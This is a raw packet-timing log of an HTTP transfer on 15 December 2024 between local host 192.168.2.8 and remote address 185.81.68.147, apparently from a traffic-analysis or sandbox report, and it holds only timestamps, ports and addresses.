                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.037669897 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.037674904 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.038395882 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.038460970 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.038495064 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.039242029 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.039341927 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.039360046 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.040112972 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.040210962 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.040239096 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.087045908 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.177200079 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.177361965 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.177454948 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.177515030 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.177608013 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.177660942 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.177678108 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.178210974 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.178320885 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.178402901 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.178872108 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.179043055 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.179121017 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.179697990 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.179802895 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.179882050 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.180510998 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.180612087 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.180694103 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.181315899 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.181423903 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.181507111 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.182147026 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.182218075 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.182312012 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.183121920 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.183403015 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.183495045 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.183981895 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.184030056 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.184114933 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.184649944 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.184781075 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.184869051 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.185497999 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.185655117 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.185741901 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.186315060 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.186438084 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.186528921 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.187254906 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.187331915 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.187424898 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.187982082 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.188096046 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.188175917 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.188858032 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.188927889 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.189009905 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.189663887 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.189774036 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.189862013 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.190510988 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.190628052 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.190716028 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.191332102 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.191430092 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.191521883 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.192167997 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.192306042 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.192394018 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.193010092 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.193094015 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.193177938 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.193854094 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.194015026 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.194099903 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.194730997 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.194822073 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.194905043 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.195508003 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.195593119 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.195676088 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.196332932 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.196378946 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.196489096 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.197303057 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.197587967 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.197670937 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.198637009 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.198679924 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.198765039 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.199469090 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.199690104 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.199773073 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.200165033 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.200225115 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.200305939 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.200788021 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.200912952 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.200994015 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.201400995 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.201487064 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.201567888 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.202168941 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.202289104 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.202369928 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.202984095 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.203094959 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.203178883 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.203850031 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.203921080 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.204005957 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.204683065 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.204777956 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.204862118 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.205490112 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.205586910 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.205672026 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.206321955 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.206429958 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.206523895 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.207206964 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.207247019 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.207329988 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.208065033 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.208147049 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.208228111 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.208836079 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.208950043 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.209029913 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.209666967 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.209784031 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.209868908 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.210514069 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.210642099 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.210722923 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.211359024 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.211457014 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.211538076 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.212121964 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.225616932 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.225694895 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.225878000 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.225929022 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.225946903 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.226008892 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.226633072 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.226691961 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.226735115 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.227492094 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.227545023 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.227577925 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.228296041 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.228363037 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.228404045 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.229140997 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.229197979 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.229235888 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.230096102 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.230171919 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.230247974 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.230802059 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.230861902 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.230895996 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.231729984 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.231781006 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.231823921 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.232474089 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.232609987 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.232613087 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.274636030 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.369035006 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.369054079 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.369224072 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.369263887 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.369430065 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.369520903 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.369956017 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.370054007 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.370131016 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.370763063 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.370887995 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.370965958 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.371598959 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.371716022 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.371794939 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.372415066 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.372539043 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.372617006 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.373264074 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.373387098 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.373465061 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.374094009 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.374223948 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.374305010 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.374921083 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.375042915 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.375123978 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.375761986 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.375864983 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.375941038 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.376607895 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.376774073 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.376852989 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.377549887 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.377640009 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.377718925 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.378283024 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.378367901 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.378444910 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.379090071 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.379276037 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.379354000 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.380038977 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.380168915 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.380245924 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.380750895 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.380863905 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.380939007 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.381618977 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.381700993 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.381776094 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.382523060 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.382606983 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.382680893 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.383265018 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.383358002 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.383430958 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.384094000 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.384207964 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.384288073 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.384936094 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.385000944 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.385081053 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.385791063 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.385876894 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.385960102 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.386589050 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.386698961 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.386779070 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.387432098 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.387536049 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.387614012 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.388273954 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.388427973 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.388509035 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.389117002 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.389238119 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.389313936 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.390031099 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.390223026 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.390299082 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.390774012 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.390885115 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.390965939 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.391623020 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.391722918 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.391801119 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.392659903 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.392710924 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.392790079 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.393516064 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.393539906 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.393634081 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.394218922 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.394301891 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.394377947 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.394990921 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.395096064 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.395173073 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.395790100 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.395880938 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.395953894 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.396598101 CET8049709185.81.68.147192.168.2.8
